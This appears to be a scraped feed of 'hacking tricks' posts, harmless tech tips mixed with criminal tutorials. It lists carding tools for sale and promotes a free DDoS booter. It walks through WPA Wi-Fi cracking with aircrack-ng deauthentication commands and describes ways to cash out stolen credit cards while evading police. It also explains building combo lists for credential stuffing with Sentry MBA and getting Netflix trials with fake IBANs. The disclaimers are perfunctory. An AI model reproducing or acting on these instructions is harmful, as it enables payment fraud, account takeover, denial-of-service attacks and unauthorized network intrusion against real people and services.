{Solution} laptop connected to the AC charging system and still shows not charging?


Here is the solution...

Follow this instructions:-

~Shutdown your laptop
~Remove battery
~Then connect the laptop to the  AC charging system
~Power on the laptop
~Press windows key+ x key and open Device Manager
~Click the on Batteries category ~Right click All of the 'Microsoft ACPI Compliant Control Method Battery' listings
~Select Uninstall In the 'confirm Device Uninstall' dialog box
Click OK
~Click on System Devices.
~Right-click the 'ACPI Fixed Features Button' and then select Uninstall
~In the 'Confirm Device Uninstall' dialog box click OK.
~ Shutdown your laptop
~Then disconnect AC
~Insert the battery
~Connect AC to your laptop
~Power on your laptop




Enjoy! Follow us for more... 

List of carding software u goin need to be successful in carding



1 : Socks5/VPN/RDP
2 : Anti detect Browser
3 : EMV CC Reader/Writer
4 : Bin checker
5 : CCleaner
6 : Credit/debit card fullz
7 : CC Generator
8 : Spammed ID
9 : Voice changer
10 : Call forwarding app
11 : MAC Address Changer
12 : Drop
Above are the required tools or software for carding in 2020. I will update the list with time and equally explain how to use each and every one of them.
If you need help with any of them or want to buy any tools contact me

Credit::- deep web70




Enjoy! Follow us for more... 

How to stress/boot/DDoS for free in 2020! [UNLIMITED ATTACKS] ?

๐Ÿ”ฅ **** ๐Ÿ”ฅ

This is a very quick and simple tutorial on how to stress/boot/DDoS for free in 2020 without using your own connection! No rocket science really and I don't encourage anyone to use it against other people since it's just very annoying, but it can be used for stress-testing your own server for example!

**Educational Purpose STRICTLY**

**Go and register : **
https://www.stressthem.to/

Go to booter panel by clicking on circular icon

Once you're there all you have to do is fill in the IP and method you want, and the time in seconds, max time you can use on the free plan is 5 minutes (so 300 seconds)

You can do unlimited attacks, enjoy! ๐Ÿ‘❤️

****
Credit-:#cyberArmy






Enjoy! Follow us for more... 

Droid Splitter : free file splitter and joiner tool




Droid Splitter is  free file splitter and joiner tool for android which helps you to split large files in to small pieces and join split files together and make a single file. It will make your life easy when you are trying to upload large size of files while having size limitations. Configurable memory buffer helps you to increase the performance and the speed of splitting and joining process.

Features:
1)Split any type of file with any size
2)Join any type of split parts
3)Configurable memory buffer. (Default size is 5MB. It is recommended to increase the buffer size into maximum if the file size larger than 1GB and decrease the buffer size into minimum if the file size less than 10MB for better performance.)
4)One touch file parts detection. ( Select any part from the split pieces, It will automatically load all the other related parts of the file)

Please feel free to rate the application. Email your suggestions and if there are any encountered issues while using the application. That will be a great help for the future enhancements of the software.



Thanks to darltech

Enjoy! Follow us for more... 

TOP STREAMING SITES (Must Use VPN)

How To Hack WPA/WPA2 Wi-Fi With Kali Linux & Aircrack-ng ?


Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks.

There are hundreds of Windows applications that claim they can hack WPA; don’t get them!
They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting hacked themselves. There is only one way that hackers get into your network, and that is with a Linux-based OS, a wireless card capable of monitor mode, and aircrack-ng or similar.

Also note that, even with these tools, Wi-Fi cracking is not for beginners. Playing with it requires basic knowledge of how WPA authentication works, and moderate familiarity with Kali Linux and its tools. If you feel you have the necessary skills, let’s begin:

These are things that you’ll need:

๐Ÿ‘‰A successful install of Kali Linux

๐Ÿ‘‰A wireless adapter capable of injection/monitor mode.

๐Ÿ‘‰A wordlist to attempt to “crack” the password once it has been captured

๐Ÿ‘‰Time and patience

If you have these then we're ready to set off

Step One:


Start Kali Linux and login, preferably as root.

Step Two:

Plugin your injection-capable wireless adapter, (Unless your native computer wireless card supports it). If you’re using Kali in VMware, then you might have to connect the card via the icon in the device menu

Step Three:

Disconnect from all wireless networks, open a Terminal, and type airmon-ng

This will list all of the wireless cards that support monitor (not injection) mode. If no cards are listed, try disconnecting and reconnecting the adapter (if you’re using one) and check that it supports monitor mode. If you’re not using an external adapter, and you still don’t see anything listed, then your card doesn’t support monitor mode, and you’ll have to purchase an external one. You can see there๐Ÿ‘† that my card supports monitor mode and that it’s listed as wlan0.

Step Four:

Type airmon-ng start followed by the interface name of your wireless card. mine is wlan0, so my command would be: airmon-ng start wlan0

The “(monitor mode enabled)” message means that the card hasb successfully been put into monitor mode. Note the name of the new monitor interface, mon0.

EDIT:
A bug recently discovered in Kali Linux makes airmon-ng set the channel as a fixed “-1” when you first enable mon0. If you receive this error, or simply do not want to take the chance, follow these steps after enabling mon0:

Type: ifconfig [interface of wireless card] down and hit Enter.
Replace [interface of wireless card] with the name of the interface that you enabled mon0 on; probably called wlan0. This disables the wireless card from connecting to the internet, allowing it to focus on monitor mode instead.
After you have disabled mon0 (completed the wireless section of the tutorial), you’ll need to enable wlan0 (or name of wireless interface), by typing: ifconfig [interface of wireless card] up and pressing Enter.

Step Five:
Type airodump-ng followed by the name of the new monitor interface, which is probably mon0.

If you receive a “fixed channel –1” error, see the Edit above๐Ÿ‘†.

Step Six:

Airodump will now list all of the wireless networks in your area, and a lot of useful information about them. Locate your network or the network that you have permission to penetration test. Once you’ve spotted your network on the ever-populating list, hit Ctrl + C on your keyboard to stop the process. Note the channel of your target network.

Step Seven:

Copy the BSSID of the target network

Now type this command:
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network. Paste the network BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface, (mon0). The “–w” and file path command specifies a place where airodump will save any intercepted 4-way handshakes (necessary to crack the password). Here we saved it to the Desktop, but you can save it anywhere.

A complete command should look similar this:
airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Now press enter.

Step Eight:

Airodump with now monitor only the target network, allowing us to capture more specific information about it. What we’re really doing now is waiting for a device to connect or reconnect to the network, forcing the router to send out the four-way handshake that we need to capture in order to crack the password.
Also, four files should show up on your desktop, this is where the handshake will be saved when captured, so don’t delete them!

But we’re not really going to wait for a device to connect, no, that’s not what impatient hackers do. We’re actually going to use another cool-tool that belongs to the aircrack suite called aireplay-ng, to speed up the process. Instead of waiting for a device to connect, hackers can use this tool to force a device to reconnect by sending deauthentication (deauth) packets to one of the networks devices, making it think that it has to reconnect with the network.

Of course, in order for this tool to work, there has to be someone else connected to the network first, so watch the airodump-ng and wait for a client to show up. It might take a long time, or it might only take a second before the first one shows. If none show up after a lengthy wait, then the network might be empty right now, or you’re to far away from the network.

You can see in this picture, that a client has appeared on our network, allowing us to start the next step.

Step Nine:

Leave airodump-ng running and open a second terminal. In this terminal, type this command:
aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0
The –0 is a short cut for the deauth mode and the 2 is the number of deauth packets to send.
-a indicates the access point/router’s BSSID, replace [router bssid] with the BSSID of the target network, which in my case, is 00:14:BF:E0:E8:D5.
-c indicates the client’s BSSID, the device we’re trying to deauth, noted in the previous picture. Replace the [client bssid] with the BSSID of the connected client, this will be listed under “STATION.”
And of course, mon0 merely means the monitor interface, change it if yours is different.

My complete command looks like this:
aireplay-ng –0 2 –a 00:14:BF:E0:E8:D5 –c 4C:EB:42:59:DE:31 mon0

Step Ten:

Upon hitting Enter, you’ll see aireplay-ng send the packets. If you were close enough to the target client, and the deauthentication process works, this message will appear on the airodump screen (which you left open):

This means that the handshake has been captured, the password is in the hacker’s hands, in some form or another. You can close the aireplay-ng terminal and hit Ctrl + C on the airodump-ng terminal to stop monitoring the network, but don’t close it yet just incase you need some of the information later.

If you didn’t receive the “handshake message,” then something went wrong in the process of sending the packets. Unfortunately, a variety of things can go wrong. You might just be too far away, and all you need to do is move closer. The device you’re attempting to deauth might not be set to automatically reconnect, in which case you’ll either have to try another device, or leave airodump on indefinitely until someone or something connects to the network. If you’re very close to the network, you could try a WiFi spoofing tool like wifi-honey, to try to fool the device into thinking that you’re the router. However, keep in mind that this requires that you be significantly closer to the device than the router itself. So unless you happen to be in your victim’s house, this is not recommended.

Do note that, despite your best efforts, there are many WPA networks that simply can’t be cracked by these tools. The network could be empty, or the password could be 64 characters long, etc.

Step 11:

This concludes the external part of this tutorial. From now on, the process is entirely between your computer, and those four files on your Desktop. Actually, it’s the .cap one, that is important. Open a new Terminal, and type in this command:
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

-a is the method aircrack will use to crack the handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the password. The * means wild card in Linux, and since I’m assuming that there are no other .cap files on your Desktop, this should work fine the way it is.

My complete command looks like this:
aircrack-ng –a2 –b 00:14:BF:E0:E8:D5 –w /root/wpa.txt  /root/Desktop/*.cap

Now press enter

Step 12:

Aircrack-ng will now launch into the process of cracking the password. However, it will only crack it if the password happens to be in the wordlist that you’ve selected. Sometimes, it’s not. If this is the case, you can try other wordlists. If you simply cannot find the password no matter how many wordlists you try, then it appears your penetration test has failed, and the network is at least safe from basic brute-force attacks.

Cracking the password might take a long time depending on the size of the wordlist. Mine went very quickly.

If the phrase is in the wordlist, then aircrack-ng will show it too you like this:

The passphrase to our test-network was “notsecure,” and you can see here that it was in the wordlist, and aircrack found it.

If you find the password without a decent struggle, then change your password, if it’s your network. If you’re penetration testing for someone, then tell them to change their password as soon as possible
If you're penetration for your own use then enjoy



DISCLAIMER: Hacking is illegal, I'll not be held responsible in case or by any means you get caught and be sued.



Enjoy! Follow us for more.... 

POP A BANNER EACH TIME WINDOWS BOOTS


To pop a banner which can contain any message you want to display just before a user is going to log on.
Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.
Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.
This can be effectively used to display the company's private policy each time the user logs on to his NT box.
It's '.reg' file would be:
REGEDIT4 [HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."

Why It is so Easy to Use Stolen Credit Cards ?



Table of Contents

The only way to say that a credit card is safe is when it’s with the owner. This is the situation because each of the numbers on the credit card are security PINs. The CVV, the card number, and the expiration date are what makes up a credit card. The metallic slate is just there with data input that communicates with the mechanisms.

The only downside in stolen credit cards is that activities can be tracked. Unless you don’t go online with the card, activities can be tracked but not easily. But not to worry, this article contains what bad guys do to get away with stolen credit cards.

How to Use Stolen Credit Card Numbers – Trending 5 Ways

There are several methods on how to use a stolen debit card to get cash immediately. The bad guys use all of these methods to get rich only when they’re careful. They don’t often worry about the cops because of the measures put in place.

1. Sell On Dark Web

This is the number one option to consider because it has zero traceability. The reason is because the stolen or picked credit card will not be tracked to you. There are very few working dark websites out there. Most of the websites who claim to be authentic are fake. That is, when they obtain the card details, they don’t pay back. As such, as the bad guy, one ought to be careful with the website in question.

What the Dark Websites Do

After a successful sign-up to any of the sites, a user will eventually follow up the screen prompts to complete a deal. I can’t say exactly how to submit the card details to a willing buyer or a fraud company in need. This is because each of these dark places have their own mode of operation.

Note: During every activity on these websites, you must have a powerful VPN connected. Otherwise, your identity will be compromised and tracked down using the IP.

Moreover, most dark nets do not pay immediately after receiving card details. Confirmations are first made before progress.

What to Know!

During the verification or deal period, do not for any reason provide your personal details. The moment this is done it can be used against you. If there are/is any other thing to do, endeavor to do so for your safety.

Here is an example of dark websites that buy credit card details very fast.

Dreammarket

This fraud powerhouse runs on Tor network that allows every user to be fully anonymous. I do not intend to link this article to the site for some reasons. If you’re interested in the complete URL, you know what to do.

It is advised to run the entire process using Tor.

Meanwhile, I know of some social groups that do this too. You sure want to know and you’re free to find out here.

2. Virtual Card-Switching

This is one if the coolest ways on how to use stolen credit card numbers to buy things. This method is simple and straightforward. In fact, smart fraudsters follow this pattern to get through all difficulties that accompany stolen credit cards. What a fraudster does here is very simple. That is, the card details are being switched to a new credit form know as virtual.

You know what this means? The fraudster is now at liberty to buy until the bank account of victim runs low. One cool feature about this method is that even cops are unable to guarantee the victim of a return. That is, the doer of the deed is almost untraceable, unless there were cameras monitoring the scene.

When cops attempt to trace the transaction, the farthest they can go is the store where the transaction took place. What exactly can the store do in this situation? Nothing! It is thus safe to say that switching details to a virtual card is one very rugged way to take advantage of credit card numbers. It could turn out to be the method you use and buy stuffs for yourself.

3. Run Facebook Ads



I was literarily dumbfounded to find out that Facebook ad runs without requesting for PIN. This has me questioning like “doesn’t this make people vulnerable?”. Well, the answer to my question is that this makes credit card owners very vulnerable.

What Fraudsters Do

Do you intend to run fraud with those credit card numbers? If so, here’s what fraudsters do to earn.

First, fraudsters require a Facebook account. There are three options to pick from.

Buying an old Facebook account.

.Hacking  Facebook account.

Creating another account with hidden IP and wrong details.

Now, the fraudster offers to advertise a company’s business and get paid. The fraudster ensures that he/she already has one, two, or more businesses who pay for the adverts. When the fraudster picks up the card details, he enters them on the Facebook ad manager and saves it as preferred card. He then increases the Facebook ad to the maximum level and shows the proof to the company. Won’t the company be pleased? Of course the company is very pleased to see their business reaching millions within few hours.

There is something funny about Facebook ad. Even when there is no money in the account attached to the credit card, the ad still runs. If the ad runs for 1 Million Dollars, that account automatically owes Facebook the sum of 1 Million Dollars while the fraudsters scampers with the money he/she is paid for the ad.

Believe me, this is unbeatable!

4. College Portals

Lots of colleges run fee payments through various platforms that do not require PINs. However, there are some fee payment platforms that demand a OTP (One-time Password). When a payment portal requests OTP, it becomes difficult to get past the transaction. This is because the account owner is being notified with the OTP for the transaction.

If you’re interested in this method, find out the operator that runs payment for the school near you. This method is best when you’re dealing with the person you know. For example, it could be that you plan to punish a stingy aunt or uncle.

How It is Done

First, the bad guy will sign-up in any payment center or rapport with the authentic guys. He tells them that he wants to run fee payments for students. Now, for every student, he pays and authenticates the payment with the OTP SMS. Until this deed is done, the account owner will not be aware of the whole game.

Note: It’s wrong to disclose one’s self to the other guys who run the payments.

At this point, all fees paid directly to the fraudster becomes his. Several states have recorded this fraud for a while now and it’s still in vogue.

5. Buy Gift Cards

Lots of guys are really into this gift card of a thing with credit details they come across. This method on how to use stolen credit card numbers is the easiest to do but very vulnerable.

Let’s say you’re getting gift cards from Amazon, your identity will be given out. And this means easy tracking. Might be you should consider going ghost or connecting with people that can make this look easy. Or better still, if you know trusted guys that do not stay in your country, message them the details via encrypted chats. They should use the card over there to run transactions and take their caught. You can find groups for this people…We’re not saying them here at all.

How Bad Guys Use Credit Card for Fraud Without Getting Caught

Before or after carrying out the act, you might want to do the following to avoid getting caught. These are the processes that the bad guys follow and they advise you to follow suite.

If you don’t know how to get stolen credit card numbers with zero trace, don’t attempt the act.

Make VPNs a companion.

If the stolen credit card details involve a conversation, encrypt the conversation.

Avoid CCTVs

Appear on hoods and gloves.

Always cover front-facing cameras.

Be speedy!

Never provide true personal details no matter the occasion.

Lastly, remain conscious of the environment and follow up the report even on the media.

Final Thoughts

How did you get the credit card number/details? Do you even know how to get stolen credit card numbers without trace? If not well enough, stay away!

Whatever reason lands credit card numbers in your palm, choose to be a good man because it pays. Despite reading how to use stolen credit card numbers here, it’s just to show you how it’s done with no support for it.








Enjoy! Follow us for more... 

HOW TO MAKE A COMBO LIST FOR FASTER CRACKS | LEGEND'S METHOD | HQ AND PRIVATE ?

**


Step 1: Scrape usernames using a API Scraper. You Can Google It For A LOL Api Scraper or search in the best forum C.to

Step 2: Make a password list. For slow, but higher chance of RP or lvl.30 accounts you could try a big password list, but that takes a long time to run a Combo. if you make a small password list such as, 10-20 you will see the cracks come a lot faster. example: I make a 800k Combo with 350 passwords, and crack 50 accounts overnight OR I can choose to make a 100-120k Combo with 10-20 passwords instead, and end up cracking 50 accounts in 1-2 hours, the same number of accounts in a faster time. ( basically choose between cracking less accounts but more hq ones or cracking lots of accounts in the hopes out of 1 of them you get a hq account) (for fastest cracks use 1 password)

Passlist Example:

You can choose to add more or less, up to you. Test new things.
qwe123
abc123
asd123
pokemon123
qwerty123
%user%
%user%123
%cuser%
%cuser%123
%cuser%1
%luser%
%luser%123
%luser%1
%useru%
%useru%1

Step 3: Download a program such as " Botop Combo Utilities Reworked " so you can combine your usernames, and passwords to make a combo list. To do this import your scraped usernames you found & also import your password list. Then combine the two lists using Botops Combo Utilities to create them into a " combo list " that is ready to use (:

Step 4: Once you have a Combo List made you can run the Combo in Sentry MBA or any other Combo checking program you have.
Don't forget to select the region of the combo you made first before starting.

Step 5: Wait until Sentry MBA or chosen program is completed running through your combo, and watch how many new cracks you got (:

Step 6: Check out your cracked accounts with SCL Checker, or any other working league of legends account checker.

Step 7: RECAP: less passwords = faster cracks (low quality accounts). more passwords = slower cracks ( but better chance of hq accounts)





Enjoy ! Follow us for more... 

HOW TO GET NETFLIX HD IN TEN MINUTES ?



1- Download a VPN and select Germany server

2- Create a Netflix account using https://temp-mail.org or any other temp mail provider.
3-Fill all information using https://fake-it.to/?for_country=de
4- It will ask you for payment option; Choose Direct Debit
5- Copy the IBAN from https://fake-it.to/?for_country=de
6- Paste it in Netflix
[If it says payment error insert a different IBAN]
7- Proceed to continue

YOU JUST GOT A NETFLIX UHD FOR FREE
DO ALL THESE STEPS AGAIN WITH NEW MAIL AFTER THE TRIAL IS EXPIRED

NOTE- REMEMBER TO CANCEL THE MEMBERSHIP 1 OR 2 DAYS BEFORE THE TRIAL EXPIRES

ENJOY. Follow us for more....

TUTORIAL ON HOW TO BUY BITCOIN WITH AMAZON. ?

๐Ÿ”ฐ๐Ÿ”ฐ๐Ÿ”ฐ

•Using any payment method linked to it, including amazon account balances

Go to google and type ipayyou.io

Now go to register if you don't have an account on ipayyou
You'll be asked to put your:
FIRST NAME , LAST NAME
EMAIL &
PASSWORD

Now a code will be sent to your gmail.
Put the code and click SUBMIT

Now select bitcoin As your default currency.
Then click create account

Now click on Earn Bitcoin

Then click on custom BTC address

Now put your bitcoin address and click save.

make sure the address you're adding must be your permanent bitcoin address that doesn't expire.
Once you put it click save

Next is select  the amount of gift card you want to buy

You will see an option Go to https://Amazon.com to Purchase

Click Go to Amazon.com to Purchase


Continue and proceed to checkout

It will take you to where you will log in your amazon account.
If you don't have account on amazon create one. And signin

When checking out in shipping address you have to select ipayou address as your shipping

Next is Save gift options

Use free shipping method. Then you click continue

Place your order with the preferred payment and order will be placed if your card is good.







Enjoy ! Follow us for more... 

How to Send Anonymous Mail to Somebody ?

Is there something serious you wish to say to someone without being known? Then, you’re in the right place to learn how to send anonymous mail to somebody. Also, the good news is that sending anonymous mail is not one of the illegal things in the world.



In my day-to-day activities, I send bulk anonymous mails to people worldwide. Sometimes, I make use of self-destructible email senders which means the mail recipients can’t reply to my mail; talk less of knowing my identity.
Sending an anonymous email is a good way to disclose your mind and hide your identity without being traced. A lot of secret agencies and hackers need it to stay on top of their game. You’re human and you deserve to know how this secret is takes place and the need to practice it.
Before then, let’s highlight some of the relevant reasons why it’s necessary to send anonymous mail to somebody.


Whistle Blowing
Table of Contents

You can’t whistle-blow in an organization or a country without going anonymous. It’ll be silly because you may expose your identity to possible attackers who may trade it on the dark web. If you’ve never gone anonymous, I’m advising you to do so before someone comes after your life.


Fearless Journalism and Investigation
As a journalist, you’re not far from danger owing to the class of people you’re dealing with. The best practice is to go anonymous before you mail the recipient. Basically, passionate journalists and other categories of investigators can’t do without know how to send anonymous mail to somebody. Stay safe and make your reports without traces by sending anonymous emails to either suspect, corrupt politicians, rapists or terrorists, etc.

Avoiding Spam
Everyone hates spam because it litters our inboxes. When dealing with websites and organizations that are spammy, you need to become an anonymous mail sender. In this situation, self-destructible emails are most recommended as the address will cease to exist once the recipient gets the mail.

Spying on Partner
You can easily expose a cheating partner using an anonymous email. You don’t have to reveal your IP address or location to such partners which means going anonymous.

Confessing Your Love
Anonymous mails will thrill the person you love. However, you do not have to make it a habit or spam their inbox.

Creating Awareness
When underground activities are taking place, the only smart means to expose such is through anonymous emails. Send anonymous mail to somebody to inform them of the threat and as them to share the message. It could be bank fraud, network scams, etc. Don’t go public before you turn the bad guy’s attention towards you.

How to Send Anonymous Mail to Somebody without Trace

1. Using a Fake Email Account
A fake email account is a good way to send anonymous mail to somebody. The procedure is simple and does not require making any payment.m or subscription. In short, it is similar to the regular mail sending but with the use of a fake email account.
Sending an anonymous email to somebody with a fake email account requires the following:
A newly created email account with fake details.
VPN software
Public IP address
If you’re sending with a personal computer or mobile phone, I recommend using a VPN to hide the original IP address. Simply, create an account with any email services like Gmail, Yahoo, etc. When done, connect the VPN by opening the software and clicking ‘Connect’, ‘Start Running’, or ‘Activate’. Go to the fake mail account, enter the recipient email address and send the message.

Make Use of the Cyber Cafe
I do not recommend using your personal computer or mobile phone. Visit the nearest cyber cafe to complete these measures. Repeat the steps by creating a fake account and writing your message. You do not require a VPN since the IP address is not pointing to you. Moreover, clear history once done or use incognito mode and do not forget to cover the computer front camera.

2. Use Burner Mail
A burner mail is another perfect way to send anonymous mail to somebody without being traced. Burner emails are known by several names including temporary mail, 10-minutes mail, disposable mail and trash mail. This involves emails that can self-destruct or expire after a given time. Moreover, burner emails mostly do not require creating any mailing account. You can set it to a ‘send-only’ or ‘receive only’ depending on the mail services in use. ‘Receive only’ is a great deal for those who want to subscribe to a particular service and stop spams from littering the main email.
Example of Burner Mail Services
Temp Mail
Email On Deck
BurnerMail
Guerrilla Mail
ThrowAwayMail
When you open any of these burner emails, it is still recommended to use a VPN since these services store your IPs for references. If, for instance, your mail contained threats, blackmail or defamation, the email service will be instructed by the security agency to provide the IP. When such is done, you’ve been compromised.

3. Email Encryption
Hardly do mail service providers encrypt your mail messages. Already, the encryption feature has manifested in social apps like WhatsApp and Facebook Messenger. This hasn’t been fully introduced to the mail world as series upon series of agencies can peep into your chat, thus, exposing your identity which isn’t anonymity.
For me, the very first thing I ensure before messaging anyone is ‘encryption’. You should go anonymous beginning from barring web pros and even the mail service provider from reading the mail content.

Disadvantages of Mail Encryption
They are Mostly Paid Services
Encrypted mail accounts are mostly paid services. Free versions are trial or beta versions that are still undergoing tests. Depending on the encryption provider, the cost can be as high as $400.
You’re Liable for the Encryption Code
If you miss the password, you can’t decrypt a message. Thus, the message is gone permanently.
Encryption is not End-to-End
Most of the encryption services are not end-to-end because your recipient may not be using the premium mail service of the same mail service provider. For example, if WhatsApp makes it possible to message a contact on WeChat, although WhatsApp provides end-to-end encryption, your message to a WeChat person will not be encrypted end-to-end.
All in all, using a VPN is still highly recommended to hide your IP address.

4. Anonymous Email Services
Other anonymous services that do not offer or are yet to offer encryption feature would be mentioned here. They are faster ways of emailing someone without having to go through hassling signups and all. However, for ‘send only’, the mail will be a one-time mail but you still require a VPN or a public network to be completely anonymous.

Unlike these Guys, Cover the Front Camera
Meanwhile, some of the companies that provide encrypted and anonymous mail services include:
ProtonMail
ProtonMail does not keep logs of IPs and other tracking details. This mail provider is a good option for sending anonymous mail to someone without the conversation being accessed by a third-party.

Hushmail
You can also send anonymous mail to someone using Hushmail. This mail service provider takes mail anonymity to a new level by implementing a ‘contact form’ feature that allows others to mail while it stays encrypted. I prefer this for my business as no third-party or agency can track my mails.

CounterMail
With CounterMail, you can anonymously send an email to someone without being traced. They are regarded as one of the best anonymous mail service providers in terms of anonymity.

LockBin
Lockbin is a free mail encryption platform. You can also upgrade to the premium account for added services.
Having seen the ways to send anonymous mail to someone, let’s learn a few more things.
Can Email be Traced to IP Address?
Yes, email can be traced to an IP address. However, with measures like the use of a VPN, an email will not be traced with IP. If you intend to use a fake Gmail account for sending mail, your IP address is automatically hidden. But, in emergency situations, Google can publish your original IP address.

Who is Allowed to Send Anonymous Mails?
Everyone is permitted to send anonymous emails to others. However, anonymous emails intended for death threats are permitted while using email-sending platforms. Some of these platforms may blow your cover by publishing your IP address. Do not threaten to take the life of another because “life is precious”.

Conclusion
Whenever you’re in an unsafe situation, do not fail to employ anonymous measures. Always have an active and trusted VPN or alternatively use cyber cafes to cover your tracks.
Do not use this as a means to blackmail someone, spread lies or threaten anyone’s life. Keep the internet ecosystem clean and use this trick for all Legit hustles.






Follow us for more... 

Unlock/Bypass Lock Android Phone from Sending SMS



Pattern lock in the android phone is one of the most used security in android mobile. With this feature, you can lock your phone with the pattern. But what do you do if you forget your pattern or your prankster Friend change your pattern lock. In that situation, you can’t unlock your android phone from the pattern. Here we give you the best advice for making a backup of that type of situation. SMS bypass is an awesome android app for bypassing your android pattern lock.
SMS bypass is the very important android app for very android users who easily forget lock pattern of his android phone. This app is so simple for resetting your android phone password. Make sure that your phone is rooted.
You only need to send simple secret password code from another android phone and your android phone will be unlocked.

STEPS TO UNLOCK Android Home screen.

1. To unlock your Phone, first install this SMS Bypass app in your Android Mobile Phone.

2. Give Permanent root access to this app.

3. Change the Secret code of this app to something new from the default code of 1234.

4. Send the Secret code from the other phone with following format                                                          secret-code reset, for example: 1111 reset

5. There is a space between tap sextet code and text. Also, note that Secret code is case sensitive.

6. The Phone will restart and remove the passcode or lock screen after receiving the secret code SMS.






Enjoy! Follow us for more... 

Bypass Android Pattern Lock from Factory Reset




This is one of the most easy way for removing or disable android pattern lockscreen in android smartphone. But In this method you lost your all contacts and android data. Make sure you try above method , If you lost all above then try this method in your android phone for bypass android pattern lockscreen in android smartphone.

1. Switch Off your android phone and start it.

2. Press Volume Down + Power Button when you power on your android device. (Or You can search for internet , how you can open android recovery mode in your android device. This combination works different in every android mobiles.)

3. Now press volume up and down button and delete all user data in your android smartphone.
This is one of the best way for bypassing android pattern lock without  using adb and cmd.

How To Make Google Chrome Browse More Faster ?


The method is very simple and we will be editing some hidden feature of chrome in this method and with that you chrome speed will boost up and it will browse webpages faster. So follow up the below methods to proceed:

#1 Method: Editing Chrome Flag Settings To Make It Faster

1. First of all open the address chrome://flags/ in your Google chrome.

2. Now there you will see lots of settings there.

3. Search out for "Maximum tiles for interest area" and change its value to 512 that is maximum RAM that you will be allocating to the Chrome.( You can use ctrl+f to find these options).

4. Now search For the "Number of raster threads" and change its value to 4.

5. Now enable "Enable fast tab/window close".

6. That's it now relaunch your browser and enjoy the faster performance of your browser.

#2 Method: Using Google Chrome Extension
1. Download and install a cool plugin
Web Boost in your Google chrome.

2. Thats it this extension will get added to your browser and you can see icon at the right top corner, just click on it to start it.

#3 Method: Changing The Settings In Google Chrome

1. First of all go to three line button at the the top right corner of your Google chrome.

2. Then click on "settings" and then "Show Advanced Settings"
.
3. Now under privacy look for "Prefetch resources to load pages more quickly" and tick on it.

4. There you will have 3 options listed in your android chrome which can be set according to as:
Always :- If you want to load pages both on cellular and wifi network.
Wifi – If only wifi connection is there then only it will load prefetch pages.
Never :- It will never prefetch pages and this can save your data on your limited connection.

#4 Method: Clearing Cache & unnecessary Plugins and Extensions

1. Type chrome://plugins/ in your google chrome and clear out or say remove the plugins that are unnecessary in your browser.

2. Type chrome://extensions/ in your chrome browser and clear all the extension that you don’t need in your browser.

3. Type chrome://settings/clearBrowserData and clear all your history from beginning including history, cache file and all other saved data of your browser to make it faster.

With these ways you can easily boost up your browser speed and can enjoy fast switching speed between tabs.

How to remove advert from your youtube ?

✌️YOUTUBE TRICKS FOR YOU✌️

Are you fond of downloading music and videos but you have problems in downloading it.. Here is tricks in youtube.

1. How to download only audios of a music or video simply go to the address bar and replace "youtube" with "listentoyoutube" and paste it in your address bar to download the audio of the video.

2. To download youtube videos in any quality like mp3,mp4,3gp simply replace "youtube" with "ssyoutube" in your browser URL and paste it in your address bar of your browser.
3. Tried of age restictions when downloading video in youtube just replace "youtube" with "nsfwyoutube" in the URL and paste it in your address bar.

4. To remove advert from your youtube. Replace "youtube" with "youtubeskip" in the url and paste it in the address bar.

5. To convert the video to graphical interweave format(gif) in youtube just replace"youtube" with "gifyoutube".

hope you learnt a lot from this tricks
Keep updated here and share the group link to friends and family worldwide✌️✌️✌️





Enjoy! Follow us for more....

How To Use Root Browser To Hack Android Games ?


Steps to be followed

Hey guys, here is an exclusive article to hack android games using root browser. Many of you know that root browser acts only as a file manager or file explorer. But, by using root browser you can hack android games. Inorder to hack android games using root browser, your android device must be rooted. You canhack android games like subway surfers, dr.driving, temple run,hill climb racing and many other popular games. With root browser app you can hack resources like gems, diamonds, coins, gold, cash, power, money etc.. Here you can find step by step procedure to hack android game using root browser. Before starting the process, let you know the features of root browser. Onlinegames cannot be hacked using root browser.

How to hack android games using root browser are as follows๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡
In order to do this trick you need to be rooted first๐Ÿ‘Œ

First of all, download and install Root Browser on your rooted.
Then tap to open it.
Go to the data folder.
Then again navigate to next data folder. 
 Now, find the folder for your game which you want to hack.

Once you are in your game’s folder, go to shared_prefs.    Now go to game.xml file. (game -The game which you want to hack)    Then  edit the code where ever you want.(for ex: If you want to change the score,edit this line ,<int name=”score” value =”0” /> write 9999999999 instead of 0).    Then click on save button.

You can use this trick to also hack WiFi and also change your android phone settings

And many more






Enjoy! Follow us for more....

How to post blank status on facebook?

Facebook are a really well established Social-Networking site and has approximately almost 1 Billion users. We are going to share you a trick in which you can boast to your friends. By posting a blank comment or status? Sounds nonsense right and sounds really easy thing to do. Well it’s not try posting a blank comment now and you will get an error about status being blank.


In Facebook, it becomes important to know what to post and when to post if you want to exude yourself as a person with high Social-networking IQ to people in Facebook. It is understandable if many of you require help in this matter and in this article we shall know when and how to post a blank status and a blank comment in Facebook.

Posting a blank status is something not all of us can do. A blank status usually signifies that the person either wants to show off that they too have learnt the ‘art’ of posting blank statuses or simply doesn’t know what to post (hence the blank). While many of you might think that this requires some sort of software (maybe that’s what your friends tell you when you ask them) but that really isn’t the case at all. Chances are the software that you downloaded is affecting your PC in a negative manner. But let’s get into the matter now. It’s time to learn how to post one and if your friends didn’t tell you how to post one, don’t worry! We will explain it for you.

Easy Instructions:

Follow these simple instructions to post a blank status for yourself.

